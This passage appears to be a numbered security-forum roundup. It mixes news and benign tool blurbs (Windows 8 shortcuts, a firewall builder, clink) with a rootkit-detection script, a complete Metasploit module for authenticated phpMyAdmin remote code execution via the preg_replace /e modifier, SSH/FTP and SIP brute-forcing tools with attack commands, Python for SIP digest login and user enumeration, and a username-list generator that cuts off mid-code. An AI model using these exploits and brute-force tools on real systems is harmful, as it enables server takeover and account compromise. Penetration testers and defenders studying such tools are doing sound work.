But the alleged series of events also highlights the measures employers can take to keep tabs on rogue workers. Among other things, a desktop monitoring system that took screenshots of employee workstations in one-minute increments helped Hostgator officials quickly zero in on Gisse. Source: http://arstechnica.com/security/2013/04/former-employee-arrested-charged-with-rooting-2700-hostgator-servers/
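The affidavit says the attacker replaced ps and netstat so that his backdoor process would not show up. The usual forensic counter-measure is to never trust one view of the process table: take the PID list from three independent sources (the ps binary, a readdir() of /proc, and a signal-0 probe of every possible PID) and flag anything that one source reports but ps does not. The script below is an added example written for this page, not something from the article or from Hostgator; the function names are mine, and the PID sets used in the self-check are constructed, not taken from a real host.

```python
"""Cross-check three process views to spot a trojaned ps (added example).

Every PID visible in /proc, plus every PID that answers a kill(pid, 0)
probe, should also appear in `ps` output. Anything alive elsewhere but
missing from ps is a candidate for a modified ps binary or for an LKM
rootkit that hides the process. Run the check twice and intersect the
results if you want to filter out processes that simply exited between
the snapshots.
"""
import os
import subprocess


def pids_from_proc():
    """PIDs as listed by readdir() on /proc (Linux only)."""
    return {int(d) for d in os.listdir("/proc") if d.isdigit()}


def pids_from_ps():
    """PIDs as reported by the ps binary, i.e. the tool an attacker may replace."""
    out = subprocess.run(["ps", "-e", "-o", "pid="],
                         capture_output=True, text=True, check=True).stdout
    return {int(tok) for tok in out.split()}


def pids_by_probe(max_pid):
    """Brute-force PID probe that does not depend on /proc at all.

    kill(pid, 0) sends no signal; it succeeds (or fails with EPERM) for a
    live PID and raises ESRCH for a dead one, so it also finds processes
    hidden by a rootkit filtering readdir() on /proc.
    """
    alive = set()
    for pid in range(1, max_pid + 1):
        try:
            os.kill(pid, 0)
            alive.add(pid)
        except PermissionError:
            alive.add(pid)          # exists, but owned by another user
        except ProcessLookupError:
            pass
    return alive


def hidden_pids(reported, *views):
    """PIDs present in any independent view but absent from the ps report."""
    union = set().union(*views)
    return sorted(union - reported)


def read_max_pid(path="/proc/sys/kernel/pid_max"):
    with open(path) as fh:
        return int(fh.read().strip())


if __name__ == "__main__":
    reported = pids_from_ps()
    suspicious = hidden_pids(reported, pids_from_proc(), pids_by_probe(read_max_pid()))
    for pid in suspicious:
        try:
            with open("/proc/%d/comm" % pid) as fh:
                name = fh.read().strip()
        except OSError:
            name = "?"              # hidden from /proc too, only the probe saw it
        print("hidden from ps: pid=%d comm=%s" % (pid, name))
```

Run it as root so the probe is not limited to your own processes. A hit is not proof of compromise on its own (short-lived children race the snapshots), but a PID that stays hidden across two runs and also has no /proc entry is exactly the pattern a modified ps or a kernel rootkit produces, and the next step is to compare the ps and netstat binaries against the package manager's checksums.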
  10. This Metasploit module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php. This affects versions 3.5.x below 3.5.8.1 and 4.0.0 below 4.0.0-rc3. PHP versions greater than 5.4.6 are not vulnerable.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'phpMyAdmin Authenticated Remote Code Execution via preg_replace()',
      'Description'    => %q{
        This module exploits a PREG_REPLACE_EVAL vulnerability in phpMyAdmin's
        replace_prefix_tbl within libraries/mult_submits.inc.php via db_settings.php
        This affects versions 3.5.x < 3.5.8.1 and 4.0.0 < 4.0.0-rc3.
        PHP versions > 5.4.6 are not vulnerable.
      },
      'Author'         =>
        [
          'Janek "waraxe" Vind', # Discovery
          'Ben Campbell <eat_meatballs[at]hotmail.co.uk>' # Metasploit Module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2013-3238' ],
          [ 'PMASA', '2013-2'],
          [ 'waraxe', '2013-SA#103' ],
          [ 'EDB', '25003'],
          [ 'OSVDB', '92793'],
          [ 'URL', 'http://www.waraxe.us/advisory-103.html' ],
          [ 'URL', 'http://www.phpmyadmin.net/home_page/security/PMASA-2013-2.php' ]
        ],
      'Privileged'     => false,
      'Platform'       => ['php'],
      'Arch'           => ARCH_PHP,
      'Payload'        =>
        {
          'BadChars' => "&\n=+%",
          # Clear out PMA's error handler so it doesn't lose its mind
          # and cause ENOMEM errors and segfaults in the destructor.
          'Prepend'  => "function foo($a,$b,$c,$d,$e){return true;};set_error_handler(foo);"
        },
      'Targets'        =>
        [
          [ 'Automatic', { } ],
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Apr 25 2013'))

    register_options(
      [
        OptString.new('TARGETURI', [ true, "Base phpMyAdmin directory path", '/phpmyadmin/']),
        OptString.new('USERNAME', [ true, "Username to authenticate with", 'root']),
        OptString.new('PASSWORD', [ false, "Password to authenticate with", ''])
      ], self.class)
  end

  def check
    begin
      res = send_request_cgi({
        'uri' => normalize_uri(target_uri.path, '/js/messages.php')
      })
    rescue
      print_error("Unable to connect to server.")
      return CheckCode::Unknown
    end

    # send_request_cgi returns nil on a timeout, so guard before reading .code
    if res.nil? || res.code != 200
      print_error("Unable to query /js/messages.php")
      return CheckCode::Unknown
    end

    # PHP > 5.4.6 is not affected, so a version banner alone can rule the host out.
    php_version = res['X-Powered-By']
    if php_version
      print_status("PHP Version: #{php_version}")
      # Match multi-digit components so that e.g. PHP/5.4.12 is not read as 5.4.1
      if php_version =~ /PHP\/(\d+)\.(\d+)\.(\d+)/
        major, minor, patch = $1.to_i, $2.to_i, $3.to_i
        if major > 5
          return CheckCode::Safe
        elsif major == 5 and minor > 4
          return CheckCode::Safe
        elsif major == 5 and minor == 4 and patch > 6
          return CheckCode::Safe
        end
      end
    else
      print_status("Unknown PHP Version")
    end

    # messages.php embeds the phpMyAdmin version as a JS variable
    if res.body =~ /pmaversion = '(.*)';/
      pma_version = $1
      print_status("phpMyAdmin version: #{pma_version}")
      case pma_version.downcase
      when '3.5.8.1', '4.0.0-rc3'
        return CheckCode::Safe
      when '4.0.0-alpha1', '4.0.0-alpha2', '4.0.0-beta1', '4.0.0-beta2', '4.0.0-beta3', '4.0.0-rc1', '4.0.0-rc2'
        return CheckCode::Vulnerable
      else
        if pma_version.start_with? '3.5.'
          return CheckCode::Vulnerable
        end
        return CheckCode::Unknown
      end
    end

    return CheckCode::Unknown
  end

  def exploit
    uri = target_uri.path

    # The login form carries an anti-CSRF token that must be echoed back
    print_status("Grabbing CSRF token...")
    response = send_request_cgi({ 'uri' => uri })

    if response.nil?
      fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.")
    end

    if (response.body !~ /"token"\s*value="([^"]*)"/)
      fail_with(Exploit::Failure::NotFound, "Couldn't find token. Is URI set correctly?")
    else
      print_good("Retrieved token")
    end

    token = $1

    post = {
      'token'        => token,
      'pma_username' => datastore['USERNAME'],
      'pma_password' => datastore['PASSWORD']
    }

    print_status("Authenticating...")
    login = send_request_cgi({
      'method'    => 'POST',
      'uri'       => normalize_uri(uri, 'index.php'),
      'vars_post' => post
    })

    if login.nil?
      fail_with(Exploit::Failure::NotFound, "Failed to retrieve webpage.")
    end

    # A successful login redirects with a fresh token in the Location header
    token = login.headers['Location'].scan(/token=(.*)[&|$]/).flatten.first
    cookies = login.get_cookies

    login_check = send_request_cgi({
      'uri'      => normalize_uri(uri, 'index.php'),
      'vars_get' => { 'token' => token },
      'cookie'   => cookies
    })

    # The login page says "Welcome to phpMyAdmin"; seeing it again means auth failed
    if login_check.body =~ /Welcome to/
      fail_with(Exploit::Failure::NoAccess, "Authentication failed.")
    else
      print_good("Authentication successful")
    end

    db = rand_text_alpha(3+rand(3))

    # from_prefix becomes the preg_replace() pattern: "/e" turns on the eval
    # modifier and the NUL byte terminates the pattern string, so to_prefix
    # (the payload) is evaluated as PHP code.
    exploit_result = send_request_cgi({
      'uri'       => normalize_uri(uri, 'db_structure.php'),
      'method'    => 'POST',
      'cookie'    => cookies,
      'vars_post' => {
        'query_type'  => 'replace_prefix_tbl',
        'db'          => db,
        'selected[0]' => db,
        'token'       => token,
        'from_prefix' => "/e\0",
        'to_prefix'   => payload.encoded,
        'mult_btn'    => 'Yes'
      }
    }, 1)
  end
end

Source: phpMyAdmin Authenticated Remote Code Execution - Packet Storm
  11. These are some shortcuts for Windows 8, check them out:

Windows key: Switch between Modern Desktop Start screen and the last accessed application
Windows key + C: Access the charms bar
Windows key + Tab: Access the Modern Desktop Taskbar
Windows key + I: Access the Settings charm
Windows key + H: Access the Share charm
Windows key + K: Access the Devices charm
Windows key + Q: Access the Apps Search screen
Windows key + F: Access the Files Search screen
Windows key + W: Access the Settings Search screen
Windows key + P: Access the Second Screen bar
Windows key + Z: Brings up the App Bar when you have a Modern Desktop App running
Windows key + X: Access the Windows Tools Menu
Windows key + O: Lock screen orientation
Windows key + . : Move the screen split to the right
Windows key + Shift + . : Move the screen split to the left
Windows key + V: View all active Toasts/Notifications
Windows key + Shift + V: View all active Toasts/Notifications in reverse order
Windows key + PrtScn: Takes a screenshot of the screen and automatically saves it in the Pictures folder as Screenshot
Windows key + Enter: Launch Narrator
Windows key + E: Open Computer
Windows key + R: Open the Run dialog box
Windows key + U: Open Ease of Access Center
Windows key + Ctrl + F: Open Find Computers dialog box
Windows key + Pause/Break: Open the System page
Windows key + 1..10: Launch a program pinned on the Taskbar in the position indicated by the number
Windows key + Shift + 1..10: Launch a new instance of a program pinned on the Taskbar in the position indicated by the number
Windows key + Ctrl + 1..10: Access the last active instance of a program pinned on the Taskbar in the position indicated by the number
Windows key + Alt + 1..10: Access the Jump List of a program pinned on the Taskbar in the position indicated by the number
Windows key + B: Select the first item in the Notification Area and then use the arrow keys to cycle through the items. Press Enter to open the selected item
Windows key + Ctrl + B: Access the program that is displaying a message in the Notification Area
Windows key + T: Cycle through the items on the Taskbar
Windows key + M: Minimize all windows
Windows key + Shift + M: Restore all minimized windows
Windows key + D: Show/Hide Desktop (minimize/restore all windows)
Windows key + L: Lock computer
Windows key + Up Arrow: Maximize current window
Windows key + Down Arrow: Minimize/restore current window
Windows key + Home: Minimize all but the current window
Windows key + Left Arrow: Tile window on the left side of the screen
Windows key + Right Arrow: Tile window on the right side of the screen
Windows key + Shift + Up Arrow: Extend current window from the top to the bottom of the screen
Windows key + Shift + Left/Right Arrow: Move the current window from one monitor to the next
Windows key + F1: Launch Windows Help and Support
PageUp: Scroll forward on the Modern Desktop Start screen
PageDown: Scroll backward on the Modern Desktop Start screen
Esc: Close a charm
Ctrl + Esc: Switch between Modern Desktop Start screen and the last accessed application
Ctrl + Mouse scroll wheel: Activate the Semantic Zoom on the Modern Desktop screen
Alt: Display a hidden Menu Bar
Alt + D: Select the Address Bar
Alt + P: Display the Preview Pane in Windows Explorer
Alt + Tab: Cycle forward through open windows
Alt + Shift + Tab: Cycle backward through open windows
Alt + F: Close the current window / Open the Shut Down Windows dialog box from the Desktop
Alt + Spacebar: Access the Shortcut menu for current window
Alt + Esc: Cycle between open programs in the order that they were opened
Alt + Enter: Open the Properties dialog box of the selected item
Alt + PrtScn: Take a screen shot of the active Window and place it in the clipboard
Alt + Up Arrow: Move up one folder level in Windows Explorer (Like the Up Arrow in XP)
Alt + Left Arrow: Display the previous folder
Alt + Right Arrow: Display the next folder
Shift + Insert CD/DVD: Load CD/DVD without triggering Autoplay or Autorun
Shift + Delete: Permanently delete the item (rather than sending it to the Recycle Bin)
Shift + F6: Cycle backward through elements in a window or dialog box
Shift + F10: Access the context menu for the selected item
Shift + Tab: Cycle backward through elements in a window or dialog box
Shift + Click: Select a consecutive group of items
Shift + Click on a Taskbar button: Launch a new instance of a program
Shift + Right-click on a Taskbar button: Access the context menu for the selected item
Ctrl + A: Select all items
Ctrl + C: Copy the selected item
Ctrl + X: Cut the selected item
Ctrl + V: Paste the selected item
Ctrl + D: Delete selected item
Ctrl + Z: Undo an action
Ctrl + Y: Redo an action
Ctrl + N: Open a new window in Windows Explorer
Ctrl + W: Close current window in Windows Explorer
Ctrl + E: Select the Search box in the upper right corner of a window
Ctrl + Shift + N: Create new folder
Ctrl + Shift + Esc: Open the Windows Task Manager
Ctrl + Alt + Tab: Use arrow keys to cycle through open windows
Ctrl + Alt + Delete: Access the Windows Security screen
Ctrl + Click: Select multiple individual items
Ctrl + Click and drag an item: Copies that item in the same folder
Ctrl + Shift + Click and drag an item: Creates a shortcut for that item in the same folder
Ctrl + Tab: Move forward through tabs
Ctrl + Shift + Tab: Move backward through tabs
Ctrl + Shift + Click on a Taskbar button: Launch a new instance of a program as an Administrator
Ctrl + Click on a grouped Taskbar button: Cycle through the instances of a program in the group
F1: Display Help
F2: Rename a file
F3: Open Search
F4: Display the Address Bar list
F5: Refresh display
F6: Cycle forward through elements in a window or dialog box
F7: Display command history in a Command Prompt
F10: Display hidden Menu Bar
F11: Toggle full screen display
Tab: Cycle forward through elements in a window or dialog box
PrtScn: Take a screen shot of the entire screen and place it in the clipboard
Home: Move to the top of the active window
End: Move to the bottom of the active window
Delete: Delete the selected item
Backspace: Display the previous folder in Windows Explorer / Move up one folder level in Open or Save dialog box
Esc: Close a dialog box
Num Lock Enabled + Plus (+): Display the contents of the selected folder
Num Lock Enabled + Minus (-): Collapse the selected folder
Num Lock Enabled + Asterisk: Expand all subfolders under the selected folder
Press Shift 5 times: Turn StickyKeys on or off
Hold down right Shift for 8 seconds: Turn FilterKeys on or off
Hold down Num Lock for 5 seconds: Turn ToggleKeys on or off
  12. ssh2ftpcrack is a simple FTP and SSH dictionary brute force cracking tool written in Perl.

Author: GhOsT-PR #puerto.ghost.rico@gmail.com

README:

Steps:
1) Install libssh2 (http://www.libssh2.org/) before installing Net::SSH2
2) Before installing Net::SSH2, install YAML
3) Type at the console as root: cpan YAML && cpan Net::SSH2

Now you are ready to use ssh2ftpcrack

Usage: ssh2ftpcrack.pl [ftp or ssh] [user] [host] [wordlist]

Download: SSH2FTPCrack FTP / SSH Brute Forcer 0.2 - Packet Storm
  13. A similar method is posted in V.i.P
  14. Instant Penetration Testing: Setting Up a Test Lab How-to [instant] | Packt Publishing, is it possible?
  15. Sanewall, making sense of firewalling

Project information

Sanewall is a firewall builder for Linux which uses an elegant language abstracted to just the right level. This makes it powerful as well as easy to use, audit, and understand. It allows you to create very readable configurations even for complex stateful firewalls.

Sanewall can be used for almost any firewall need, including:
control of any number of internal/external/virtual interfaces
control of any combination of routed traffic
setting up DMZ routers and servers
all kinds of NAT
providing strong protection (flooding, spoofing, etc.)
transparent caches
source MAC verification
blacklists, whitelists

The current experimental snapshots support IPv6. Sanewall abstracts the differences between IPv4 and IPv6, allowing you to define a common set of rules for both whilst permitting specific rules for each as you need.

Sanewall is a fork of FireHOL. The configuration language is identical, just see this FAQ for some variable name changes. For now the FireHOL website is still the best source of introductory information.

Sanewall is released under the GPLv2+ open source licence.

Downloads: Latest Release, All Releases, Daily Snapshots, Git Repositories

Source: Sanewall - Home
  16. emkei.cz lands in spam
  17. clink

Bringing Bash's powerful command line editing to Microsoft Windows' cmd.exe

Introduction

Clink enhances your productivity in Microsoft Windows' "cmd.exe". If you're familiar with Bash then you will be familiar with the changes that clink brings to "cmd.exe" (it uses the same 'Readline' library that Bash uses). It is a small utility to enhance "cmd.exe", adding more powerful command line completion, editing, and history.

Features

Powerful Bash-like line editing from GNU's Readline library. Read more on Readline's keyboard shortcuts.
Superior path completion (TAB).
Paste from clipboard (Ctrl-V).
Support for the completion of executables/commands, and environment variables.
Undo/Redo (Ctrl-_ or Ctrl-X, Ctrl-U)
Improved command line history. Persists across sessions. Searchable (Ctrl-R and Ctrl-S). History expansion (e.g. !!, !<string>, and !$).
Scriptable completion using Lua.

Usage

There are a variety of ways to start clink:
If you installed the auto-run, start "cmd.exe" as per usual.
To manually start, run the clink shortcut from the Start menu (or the clink.bat located in the install directory).
To deploy clink to an existing cmd.exe process, use "<install_dir>\clink.exe inject"

clink has been tested on Windows XP SP3 and upwards.

Visual C++ Redistributable requirement

clink requires that Microsoft's Visual C++ 2010 Redistributable be installed on your system. If you need to install it, it can be found here:
32-bit (x86): Download Microsoft Visual C++ 2010 Redistributable Package (x86) from Official Microsoft Download Center
64-bit (x64): Download Microsoft Visual C++ 2010 Redistributable Package (x64) from Official Microsoft Download Center

Writing completion scripts with Lua

It is easy to customise completion in clink with simple Lua scripts. It is a matter of writing a match generator function and registering the function with clink. When called, the generator function adds matches to clink, if appropriate. A very basic example script gives the best overview of what is involved:

-- Globals;
--   rl_line_buffer : The current command line.
--   rl_point       : Current location of the cursor.

function example_match_generator(text, first, last)
    -- Arguments;
    --   text  : The word being completed, as tokenised by Readline.
    --   first : The index into rl_line_buffer where 'text' starts.
    --   last  : Index into rl_line_buffer where 'text' ends.
    -- Returns;
    --   true  : No further generator functions should be called.
    --   false : Generator has done nothing. Try the next generator.

    -- In this simple example generate a match when the user types
    -- the following; my_ma<TAB>
    -- (Lua parses 'not a == b' as '(not a) == b', which is never true,
    -- so the guard has to be written with ~=.)
    if rl_line_buffer ~= "my_ma" then
        return false
    end

    clink.add_match("my_match")
    return true
end

-- clink.register_match_generator(<function>, <priority>)
clink.register_match_generator(example_match_generator, 50)

Further examples can be found in clink's install directory. User's Lua scripts go in %ALLUSERSPROFILE%\clink\ (which is usually C:\ProgramData\clink\) and clink loads the .lua files it finds there. The keyboard shortcut Ctrl-Q will force clink to reload the Lua scripts, which is useful when writing your own scripts.

Changing match display colour

Create a new Lua script in %ALLUSERSPROFILE%\clink\ and add the following line (where X is a number in the range 0-15):

clink.setpalette(X)

For values for X run "color /?" on a command prompt.

Building clink

Download Premake from here: Premake | Industrious One. There is a bug in Premake 4.3 that generates corrupt .vcxproj files. Please use 4.4 (or newer).
Run "premake <toolchain>" in the root of clink's source tree, where "<toolchain>" is one of Premake's actions (see "premake --help"). clink has been tested with vs2010, gmake (with mingw32), and vs2008.
Build scripts will be generated in ".build\<toolchain>\". For example: .build\vs2010\clink.sln.

Builds

Builds from the git repository can be found here: https://www.dropbox.com/sh/r9oqmn2mqfp3okp/Jm_F3pJSNI

Downloads

Source: https://code.google.com/p/clink/
  18. Viproy - VoIP Penetration Testing Kit

Project Page: http://www.github.com/fozavci/viproy-voipkit
Download: https://github.com/fozavci/viproy-voipkit/archive/master.zip

Viproy VoIP Pen-Test Kit is developed to improve the quality of SIP penetration tests. It provides an authentication feature that helps to create simple tests. It includes 7 different modules with authentication support: options tester, brute forcer, enumerator, invite tester, trust analyzer, proxy and registration tester. All attacks can be performed before and after authentication to fuzz SIP services and value added services. A SIP pen-test guide will be published soon. Basic usage of the modules is presented below; it can be used until the guide is out. All modules support DEBUG and VERBOSE.

Preparing Test Network

VulnVOIP is a vulnerable SIP server, you can use it for tests.
VulnVOIP: VulnVoIP Archives - Rebootuser

Installation

Copy the "lib" and "modules" folders' content to the Metasploit root directory.
The Mixins.rb file (lib/msf/core/auxiliary/mixins.rb) should contain this line:
require 'msf/core/auxiliary/sip'

Videos & Papers

Attacking SIP/VoIP Servers Using VIPROY VoIP Pen-Test Kit for Fun & Profit - Video (50 mins)
This is a training video for penetration testing of SIP servers.

Chapters of Training Video
1-Footprinting of SIP Services
2-Enumerating SIP Services
3-Registering SIP Service with/without Credentials
4-Brute Force Attack for SIP Service
5-Call Initiation with/without Spoof & Credentials
6-Hacking Trust Relationships
7-Intercepting SIP Client with SIP Proxy

Sample Usage Video
Hacking Trust Relationships of SIP/NGN Gateways - Video
Hacking Trust Relationships Between SIP Gateways (PDF): http://viproy.com/files/siptrust.pdf

Usage

Global Settings
setg CHOST 192.168.1.99       #Local Host
setg CPORT 5099               #Local Port
setg RHOSTS 192.168.1.1-254   #Target Network
setg RHOST 192.168.1.201      #Target Host

Basic Usage of OPTIONS Module
use auxiliary/scanner/sip/vsipoptions
show options
set THREADS 255
run

Basic Usage of REGISTER Module
use auxiliary/scanner/sip/vsipregister
show options
run
set LOGIN true
set USERNAME 101
set PASSWORD s3cur3
run

Basic Usage of INVITE Module
use auxiliary/scanner/sip/vsipinvite
set FROM 2000
set TO 1000
run
set LOGIN true
set FROM 102
set USERNAME 102
set PASSWORD letmein123
run
set DOS_MODE true
set NUMERIC_USERS true
set NUMERIC_MIN 200
set NUMERIC_MAX 205
run

Basic Usage of ENUMERATOR Module
use auxiliary/scanner/sip/vsipenumerator
show options
unset USERNAME
set USER_FILE /tmp/files/users2
set VERBOSE false
set METHOD SUBSCRIBE
run
unset USER_FILE
set METHOD SUBSCRIBE
set NUMERIC_USERS true
set NUMERIC_MAX 2300
run
set METHOD REGISTER
run

Basic Usage of BRUTE FORCE Module
use auxiliary/scanner/sip/vsipbruteforce
show options
set RHOST 192.168.1.201
set USERNAME 2000
set PASS_FILE /tmp/files/passwords
set VERBOSE false
run
unset USERNAME
set USER_FILE /tmp/files/users2
run
unset USER_FILE
set NUMERIC_USERS true
set NUMERIC_MAX 500
run

Basic Usage of Trust Analyzer Module
use auxiliary/scanner/sip/vsiptrust
show options
set SRC_RHOSTS 192.168.1.200-210
set SRC_RPORTS 5060
set SIP_SERVER 192.168.1.201
set INTERFACE eth0
set TO 101
run
show options
set ACTION CALL
set SRC_RHOSTS 192.168.1.202
set FROM James Bond
run

Basic Usage of SIP Proxy Module
use auxiliary/scanner/sip/vsipproxy
show options
set PRXCLT_PORT 5060
set PRXCLT_IP 192.168.1.99
set PRXSRV_PORT 5089
set PRXSRV_IP 192.168.1.99
set CLIENT_IP 192.168.1.120
set CLIENT_PORT 5060
set SERVER_IP 192.168.1.201
set SERVER_PORT 5060
set CONF_FILE /tmp/sipproxy_replace.txt
set LOG true
set VERBOSE false
run

Source: Viproy - Tools
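What the REGISTER, ENUMERATOR and BRUTE FORCE modules above do on the wire is the same three-step exchange: send a REGISTER (or SUBSCRIBE) for an extension, read the status code, and, when the registrar answers 401, compute a Digest response from the challenge and send the request again. The Python below is an added example written for this page, not Viproy's code; it builds the messages per RFC 3261, computes the RFC 2617 Digest without qop (the variant most SIP registrars issue), and applies the enumeration heuristic the modules rely on. The two sample responses are constructed, not captured from a real registrar, and the "401 means the user exists, 404 means it does not" rule is an assumption about registrar behaviour: some registrars challenge every REGISTER, in which case only the authenticated second round tells you anything.

```python
"""SIP REGISTER with Digest authentication and response-based user enumeration.

Added example, not part of Viproy. Message layout follows RFC 3261; the
Digest computation is the RFC 2617 scheme without qop.
"""
import hashlib
import re
import uuid


def build_register(user, domain, local_ip, local_port, cseq=1, auth=None, call_id=None):
    """Return a REGISTER request; `auth` is an Authorization header value, if any."""
    call_id = call_id or uuid.uuid4().hex
    lines = [
        "REGISTER sip:%s SIP/2.0" % domain,
        "Via: SIP/2.0/UDP %s:%d;branch=z9hG4bK%s;rport" % (local_ip, local_port, uuid.uuid4().hex[:16]),
        "Max-Forwards: 70",
        "From: <sip:%s@%s>;tag=%s" % (user, domain, uuid.uuid4().hex[:8]),
        "To: <sip:%s@%s>" % (user, domain),
        "Call-ID: %s" % call_id,
        "CSeq: %d REGISTER" % cseq,
        "Contact: <sip:%s@%s:%d>" % (user, local_ip, local_port),
        "Expires: 3600",
        "Content-Length: 0",
    ]
    if auth:
        lines.insert(8, "Authorization: %s" % auth)
    return "\r\n".join(lines) + "\r\n\r\n"


def parse_response(raw):
    """Split a SIP response into (status_code, headers); header names are lower-cased."""
    head = raw.split("\r\n\r\n", 1)[0]
    status_line, *header_lines = head.split("\r\n")
    m = re.match(r"SIP/2\.0 (\d{3})", status_line)
    if not m:
        raise ValueError("not a SIP response: %r" % status_line)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return int(m.group(1)), headers


def parse_challenge(www_auth):
    """Pull realm/nonce/algorithm out of a 'WWW-Authenticate: Digest ...' header value."""
    return dict(re.findall(r'(\w+)="?([^",]+)"?', www_auth))


def digest_response(user, realm, password, method, uri, nonce):
    """RFC 2617 Digest without qop: MD5(HA1 ':' nonce ':' HA2)."""
    ha1 = hashlib.md5(("%s:%s:%s" % (user, realm, password)).encode()).hexdigest()
    ha2 = hashlib.md5(("%s:%s" % (method, uri)).encode()).hexdigest()
    return hashlib.md5(("%s:%s:%s" % (ha1, nonce, ha2)).encode()).hexdigest()


def authorization_header(user, realm, password, method, uri, nonce):
    resp = digest_response(user, realm, password, method, uri, nonce)
    return ('Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s", algorithm=MD5'
            % (user, realm, nonce, uri, resp))


def classify_user(status):
    """Enumeration heuristic (assumed registrar behaviour): a challenge means the
    extension exists, 403/404 means it does not, anything else is inconclusive."""
    if status in (401, 407):
        return "exists"
    if status in (403, 404):
        return "unknown-user"
    return "inconclusive"


# Constructed sample responses, not captured from a real registrar.
SAMPLE_CHALLENGE = (
    "SIP/2.0 401 Unauthorized\r\n"
    "Via: SIP/2.0/UDP 192.168.1.99:5099;branch=z9hG4bKdeadbeef;received=192.168.1.99\r\n"
    "From: <sip:101@192.168.1.201>;tag=abc\r\n"
    "To: <sip:101@192.168.1.201>;tag=as1d2e3f\r\n"
    "Call-ID: c0ffee\r\n"
    "CSeq: 1 REGISTER\r\n"
    'WWW-Authenticate: Digest algorithm=MD5, realm="asterisk", nonce="4f8c1a2b"\r\n'
    "Content-Length: 0\r\n\r\n"
)
SAMPLE_NOT_FOUND = "SIP/2.0 404 Not Found\r\nCSeq: 1 REGISTER\r\nContent-Length: 0\r\n\r\n"


def register_with_auth(user, password, domain, challenge_raw,
                       local_ip="192.168.1.99", local_port=5099):
    """Second REGISTER, built from the 401 challenge the first one provoked.

    The Call-ID is reused and CSeq incremented, as a real UA would do.
    """
    status, headers = parse_response(challenge_raw)
    if status != 401:
        raise ValueError("expected 401, got %d" % status)
    ch = parse_challenge(headers["www-authenticate"])
    uri = "sip:%s" % domain
    auth = authorization_header(user, ch["realm"], password, "REGISTER", uri, ch["nonce"])
    return build_register(user, domain, local_ip, local_port,
                          cseq=2, auth=auth, call_id=headers["call-id"])
```

To drive it against a lab box such as VulnVOIP, send the output of build_register() over a UDP socket to port 5060, feed the reply to parse_response(), and pass it to register_with_auth(); a 200 OK on the second round is a valid credential, a second 401 is a wrong one. Note that the same digest_response() is what an offline cracker computes when it has sniffed the challenge and the client's response, which is why SIP credentials on the wire should be treated as recoverable.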
  19. There's Fun Stuff for that if you find it amusing; hahahaha
  20. Welcome back!
  21. usernamer is a penetration testing tool to generate a list of possible usernames/logins for a given name (ex: John Doe Doeson) for user enumeration or bruteforcing. This tool also supports text files with one name per line as input.

Features

usernamer has a plugin structure that enables a series of transformations:
normal: Permutates given name with all surnames (if more than one) with name starting and ending (johndoedoeson, johndoesondoe, doedoesonjohn etc)
two_terms: Permutates given name with all surnames (if more than one) with name starting and ending but it will output a two-termed login (johndoe, doejohn, johndoeson etc)
one_term: Permutates all name tokens (first name and surnames) and generates single-term usernames (john, doe, doeson)
dotted_two_terms: Permutates given name with all surnames (if more than one) with name starting and ending but it will output a two-termed login dot-separated (john.doe, doe.john, john.doeson etc)
normal_abbreviated: Generates abbreviated versions of the 'normal' and 'two_terms' plugins (jdoe, johnd, jd etc)

Usage:

usage: usernamer.py [ -f <file> ] [ -n <full name> ] [ -l ]

flags:
-n supplies a single name
-f supplies name entries from text file
-l converts result to lowercase
-p manually specify plugins (comma-separated) [default: all]
   ['normal', 'two_terms', 'one_term', 'normal_abbreviated', 'dotted_two_terms']

usernamer.py

#!/usr/bin/env python
"""
$Id: $

Copyright © 2012-2013 Jan Seidl <jseidl@wroot.org> (http://wroot.org/)

LICENSE:
This software is distributed under the GNU General Public License version 3 (GPLv3)

LEGAL NOTICE:
THIS SOFTWARE IS PROVIDED FOR EDUCATIONAL USE ONLY!
IF YOU ENGAGE IN ANY ILLEGAL ACTIVITY THE AUTHOR DOES NOT TAKE ANY RESPONSIBILITY FOR IT.
BY USING THIS SOFTWARE YOU AGREE WITH THESE TERMS.
"""

import getopt, sys

####
# Program info
####

USERNAMER_VERSION = "1.0-rc1"
BUILD_DATE = "2012-03-15"

AVAILABLE_PLUGINS = [ 'normal', 'two_terms', 'one_term', 'normal_abbreviated', 'dotted_two_terms' ]
AVAILABLE_FILTERS = [ 'sort', 'unique' ]

####
# Program Functions
####

def parse_file(filePath, plugins = [], filters = []):
    try:
        with open(filePath, 'r') as fileObject:
            for line in fileObject:
                parse_name(line, plugins, filters)
    except IOError:
        e = "Could not open the file: " + filePath
        error(e)

def parse_name(name, plugins = [], filters = []):
    name = name.strip()           # Trim whitespaces
    nameTokens = name.split(' ')  # Tokenize name and each surname
    numTokens = len(nameTokens)

    if numTokens < 2:
        error('Name and at least one Surname must be supplied')

    # Split First Name and Surnames
    firstName = nameTokens[0]
    nameTokens.pop(0)
    surnames = nameTokens

    results = []

    # Run Plugins
    run_plugins(firstName, surnames, results, plugins)

    # Run Filters
    run_filters(results, filters)

    for result in results:
        print(result)

def run_plugins(firstName, surnames, resultList, plugins = []):
    defaultPlugins = AVAILABLE_PLUGINS

    if len(plugins) == 0:
        plugins = defaultPlugins

    for pluginName in plugins:
        internalPluginName = "plugin_" + pluginName

        # Validate if plugin exists
        if not internalPluginName in globals():
            error("Invalid plugin: " + pluginName)

        pluginObject = globals()[internalPluginName]
        pluginObject(firstName, surnames, resultList)

def run_filters(resultList, filters = []):
    defaultFilters = AVAILABLE_FILTERS

    if len(filters) == 0:
        filters = defaultFilters

    for filterName in filters:
        internalFilterName = "filter_" + filterName

        # Validate if filter exists
        if not internalFilterName in globals():
            error("Invalid filter: " + filterName)

        filterObject = globals()[internalFilterName]
        filterObject(resultList)

####
# Result Filters
####

# Unique Filter
#
# Removes duplicated entries
def filter_unique(resultList):
    uniqueResults = set(resultList)
    del resultList[:]
    for result in uniqueResults:
        resultList.append(result)

# Sort Filter
#
# Filter entries alphabetically
def filter_sort(resultList):
